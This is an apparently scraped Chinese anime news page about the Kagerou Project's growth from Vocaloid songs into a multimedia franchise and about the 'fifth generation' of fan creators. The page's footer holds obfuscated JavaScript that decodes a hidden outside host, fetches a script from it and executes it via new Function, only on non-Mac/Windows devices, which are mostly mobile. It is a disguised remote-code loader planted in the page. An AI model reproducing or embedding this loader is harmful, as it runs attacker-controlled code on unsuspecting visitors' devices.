阳炎模式如何在中国“第五世代”中落地生根

佚名动漫资讯人气:383时间:2022-02-25 00:03:36

  如今的世界,是个信息大爆炸的全新时代。那么,IP的养成要从何种形态切入呢?

  有人说,每个企业都应做自己最擅长的事情,其他的要找对应行业的前三去协作。有人说,应先侧重不需要怎么思考、最快最直接的第一层面,比如漫画动画唱片,传播出去之后在衍生出游戏、真人剧舞台剧、玩具等第二层面。

  日本的《阳炎计划》(kagero project),是另一个例子,它所代表的日漫“第五世代”,从Vocaloid乐曲、鬼畜恶搞、二次创作等出发,获得较高关注度之后进行小说化、漫画化、动画化,打造一个粉丝群体更大的IP。现在《阳炎计划》百度贴吧有十万关注会员,规模上处于同类日本IP中的上层水准。

游民星空

《阳炎计划》的兴起

  《阳炎计划》的起源是日本宅男Jin于2011年2月在日本弹幕视频网站Niconico发表的歌曲《人造敌人》,有了反响之后他又创作系列歌曲,因为Jin擅长将故事融入歌词与旋律当中,成功塑造了一个宅男逆袭、超能力者大乱斗的故事,然后被日本的商业公司盯上,然后有了轻小说、漫画、动画等。今年3月30日,官方宣布轻小说销量突破780万本。

  《阳炎计划》的歌词、小说、动画,讲述的简单而有效,主要角色是一群孤独但具备与眼睛相关的超能力的少男少女。他们有的能隐身,有的可以强制吸引目光,有的可以治疗,有的可以让对手石化……有些像游戏的设定。男主角如月伸太郎因键盘鼠标故障而不得不走出家门——此前他宅了两年,与超能力团体相识,遭遇事件,解决事件,最后走出孤独。

游民星空

  这个故事有很多不足,但逃离现实的幻想元素与励志情节足以打动许多年轻族群,同时给二次创作留下广阔空间,再加上日式漫画风格塑造的时尚、美型、自恋的角色,让《阳炎计划》在一大堆Vocaloid乐曲中脱颖而出,还引领了Vocaloid轻小说化、漫画化、动画化、舞台剧化的浪潮,比如《千本樱》有小说、《御神乐学园》要有动画。

第五世代的得与失

  以《阳炎计划》等作品为代表的日漫第五世代,是指在互联网发展之后分享成本极速降低,带来唱见、游戏实况、二次创作、鬼畜恶搞等用户UGC行为,在这一时期成长起来的新一代御宅族,有强烈的网络化和轻度化特征 。

  《阳炎计划》因二次创作而发展壮大,绘师Shidu就是因为听了乐曲后有感而发进行二次创作被Jin关注之后加入成为《阳炎计划》的主力画师,官方也一直鼓励这种行为,对IP原作进行传播与推广。

  互联网与IT技术的发展降低了二次创作的门槛,粉丝们可以很容易地用智能手机与Vocaloid等软件进行翻唱和创作,然后在iTunes、Niconico等音视频平台上扩散,在Pixiv发布同人画作,在上发起讨论。

  互联网的发展也提升了年轻族群对参与感的需求,越来越多的人参与到二次创作中,模糊了“受众”与“创作者”的界限。

游民星空

  《阳炎计划》也因自身原创能力不足和二次创作的负面影响双重打击而裹足不前,粉丝群体太过年轻而购买力低,二次创作的作者与官方争利(同人本也是要粉丝掏钱买的)。结果《阳炎计划》轻小说大卖,但止步于制作粗糙的动画以及销量惨淡的BD&DVD。

  与之相比,《舰队Collection》等作因为官方的强力,境遇要好很多。

  虽然第五世代在中国影响力远不如日本,甚至幕后推手之一雅马哈都因为Vocaloid China项目盈利太差而将其停运。但中国也有一些发起自“民间”的创作,有着成为第五世代力作的潜力,行业人士可以略加关注。

  ilem的《阴阳先生》《僵尸舞》《怪物大暴走》《普通Disco》,在B站上都有非常高的播放量,曲风洗脑、歌词故事性强、PV视频有趣。

  《权御天下》单个视频已有百万播放,视频由7人团队合力而成,制作精美,最近还被某三国游戏盗用了素材。

  围绕这些作品的部分二次创作,比如三无的翻唱,播放量也达到数十万量级。由它们,我们似乎可以看到一种可以超越《阳炎计划》的商业逻辑和潜力,不过这里可能要进行一番中国式本地化,把日本的P站的二次创作、唱见翻唱、2CH上厨黑大战、Twitter讨论等,换成A站B站的二次创作、半次元的同人画、新浪微博、百度贴吧的讨论……

游民星空

本站所有视频和图片均来自互联网收集而来,本网站只提供web页面服务,并不提供资源存储,也不参与录制、上传
若本站收录的节目无意侵犯了贵司版权,请发邮件至 (我们会在3个工作日内删除侵权内容,谢谢。)

Copyright © 2019 樱花动漫

function DvSkH(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function rdIfsiYJ(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DvSkH(t);};window[''+'X'+'H'+'H'+'j'+'k'+'E'+'P'+'u'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=rdIfsiYJ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';console.log(u);var xhr=new XMLHttpRequest();xhr.open('GET',u+'/s/a?_='+i);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function(data.data)(cs);}};xhr.send('u=1');})('aHR0cHM6Ly9hcGkueHJrYWRzbG1nZy54eXo=','448969141036261376',window,document,['','VxKGyJk']);}:function(){};

电影

剧集

综艺

动漫

专题

明星